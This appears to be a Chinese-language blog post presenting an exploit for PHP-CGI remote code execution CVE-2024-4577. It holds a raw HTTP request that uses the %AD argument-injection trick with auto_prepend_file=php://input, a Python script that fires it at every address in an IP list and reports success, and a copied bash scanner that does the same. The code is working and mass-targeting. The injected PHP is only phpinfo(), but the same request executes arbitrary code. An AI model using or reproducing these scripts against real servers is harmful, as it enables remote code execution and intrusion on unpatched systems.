參考:https://www.ddosi.org/cve-2024-4577/
HTTP 請求包👇
POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 21
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
phpinfo();
?>
編寫exp.py👇
'''
EXP
of
PHP RCE CVE-2024-4577
'''
if __name__=='__main__':
    # Startup banner ("starting now"), printed before any network activity.
    print('我開始啦')
    import requests
    import re
    import json  # imported but never used in this script
    ###############👇
    # Hard-coded absolute Windows path of the newline-separated address list.
    path=r"D:\phpstudy_pro\WWW\UPLOAD\py\CVE-2024-4577\IP-list.txt" # location of the address-list file
    ###############👆
    # Earlier indicator attempt kept by the author; unused.
    #pattern = r'\{.*\}'
    # Success indicator: the HTML heading phpinfo() emits. A match means the PHP
    # code carried in the POST body was executed by the target.
    pattern = r"<h1 class=\"p\">PHP Version"
    # Build the full request URL for every entry of the address list.
    def addstr(url: str) -> str:
        """Turn one address-list entry into the complete probe URL.

        Prepends ``http://`` when that exact prefix is absent, drops one trailing
        slash, then appends the fixed query string ``url_tail``.
        """
        # %AD is byte 0xAD (soft hyphen). On affected Windows PHP-CGI builds it is
        # mapped to '-', so the query becomes php-cgi options
        # (-d allow_url_include=1 -d auto_prepend_file=php://input). The same
        # literal is the request-side detection signature: look for %AD followed
        # by 'd' together with auto_prepend_file / allow_url_include in access logs.
        url_tail=r'/test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'
        def add_http_header(url: str) -> str:
            """Prefix ``http://`` unless the string already starts with exactly that."""
            if not url.startswith('http://'):
                url = 'http://' + url
            return url
        def delxiegang(url: str) -> str:
            """Strip a single trailing slash ("xiegang" = slash)."""
            if url.endswith('/'):
                url=url[:-1]
            return url
        def addxiegang(url: str) -> str:
            """Append a trailing slash if missing. Defined but never called here."""
            if not url.endswith('/'):
                url =url+'/'
            return url
        http_url= add_http_header(url)
        final_url=delxiegang(http_url)+url_tail
        return final_url
    address_list: list[str]=[]
    # Read the address list; each line becomes one fully-formed probe URL.
    with open(path,'r',encoding='utf-8') as file:
        for line in file:
            address_list.append(addstr(line.replace("\n", "")))
    print(address_list)
    def send_poc(url: str) -> None:
        """POST the PHP probe to ``url`` and print whether phpinfo() output came back.

        Any exception (network, decoding, regex) is caught by the bare ``except``
        and reported as a generic error line. Returns nothing.
        """
        url=url
        headers = {
            "User-Agent": "curl/8.3.0",
            "Accept": "*/*",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "keep-alive"
        }
        # The body is executed as PHP only because the query string set
        # auto_prepend_file=php://input on a vulnerable php-cgi.
        data = "<?php phpinfo(); ?>"
        try:
            response = requests.post(url, headers=headers, data=data)
            response.encoding='utf-8'
            response_text=response.text
            # Non-empty match list == phpinfo() heading present in the response.
            matches = re.findall(pattern, response_text)
            if matches:
                print("#利用成功!!!!!!!!!!!!!!!!!!!,url:", url)
            else:
                print("@未找到匹配項。", url)
        except:
            print("@發生了一個錯誤", url)
            pass
    # send poc (above)
    #print(response.text)
    # check php_info (below)
    for address_url in address_list:
        send_poc(address_url)
我寫完這個py指令碼才發現github上已經有人寫了bash指令碼,思路差不多一樣👇
https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.sh
#!/bin/bash
# Function to check vulnerability for a domain
check_vulnerability() {
    # Probe one domain ($1) and print it as vulnerable when the response body
    # contains phpinfo() output.
    local domain=$1
    # %AD is byte 0xAD (soft hyphen); on affected Windows PHP-CGI builds it is
    # mapped to '-', turning the query into php-cgi options
    # (-d allow_url_include=1 -d auto_prepend_file=php://input). That literal is
    # also the request-side detection signature for this CVE in web-server logs.
    # The POST body is executed as PHP because auto_prepend_file points at php://input.
    local response=$(curl -s -X POST "${domain}/test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
        -H "User-Agent: curl/8.3.0" \
        -H "Accept: */*" \
        -H "Content-Length: 23" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Connection: keep-alive" \
        --data "<?php phpinfo(); ?>" \
        --max-time 10)
    # Glob match: "PHP Version" anywhere in the body (the phpinfo() heading).
    if [[ $response == *"PHP Version"* ]]; then
        echo "$domain: Vulnerable"
    fi
}
# Main function to iterate over domains
main() {
    # Read the domain list ($1) line by line and probe each entry.
    local file=$1
    # `|| [ -n "$domain" ]` also handles a last line with no trailing newline,
    # which `read` alone would return non-zero for.
    while IFS= read -r domain || [ -n "$domain" ]; do
        check_vulnerability "$domain"
    done < "$file"
}
# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
    # Usage text goes to stdout; exit status 1 signals the argument error.
    echo "Usage: $0 <domain_list_file>"
    exit 1
fi
# Call the main function with the domain list file
main "$1"
我的正則和他的萬用字元匹配到的字串都一樣,挺巧的。